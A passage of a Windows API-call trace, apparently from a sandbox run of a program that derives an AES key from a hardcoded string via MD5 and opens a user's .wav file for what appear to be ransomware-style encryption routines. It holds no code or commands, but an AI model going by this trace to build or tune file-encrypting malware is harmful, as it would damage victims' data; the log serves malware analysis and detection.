dwCmpFlags=0x1, lpString1="fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="agIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.467] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.467] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0182.467] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0182.467] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0182.467] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.467] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.468] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.468] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.468] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.468] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x223d2d0, ftCreationTime.dwHighDateTime=0x1d5da62, ftLastAccessTime.dwLowDateTime=0x2574c2b0, ftLastAccessTime.dwHighDateTime=0x1d5e60d, ftLastWriteTime.dwLowDateTime=0x2574c2b0, ftLastWriteTime.dwHighDateTime=0x1d5e60d, nFileSizeHigh=0x0, nFileSizeLow=0x122b9, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="teBq0VdNSx.wav", cAlternateFileName="TEBQ0V~1.WAV")) returned 0x90af58 [0182.468] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0182.468] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.468] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.468] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.468] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0182.468] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.468] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0182.468] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.468] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.468] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0182.469] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.469] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.469] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.469] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.469] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.469] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0182.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.469] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0182.470] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.470] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.470] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0182.470] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.470] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.470] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.470] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.470] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.470] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.470] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.470] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.470] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.470] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.470] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.470] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.470] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0182.470] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.470] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.471] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.471] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.471] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.471] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0182.471] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.471] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.471] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.471] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.471] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.471] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.471] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.471] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.471] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.471] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.471] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.471] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.471] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0182.471] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.471] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.472] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.472] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.472] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0182.472] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.472] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.472] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.472] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0182.472] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.472] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.472] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.472] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.472] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.472] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.472] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0182.472] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.473] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.473] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.473] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.473] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.473] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.473] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0182.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.473] CryptDestroyHash (hHash=0x90ae18) returned 1 [0182.473] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.473] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.473] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.473] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.473] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp\\tebq0vdnsx.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0182.474] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.474] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0182.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0182.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0182.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0182.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0182.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0182.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0182.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0182.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0182.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0182.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0182.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0182.476] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0182.476] PeekMessageW (in: 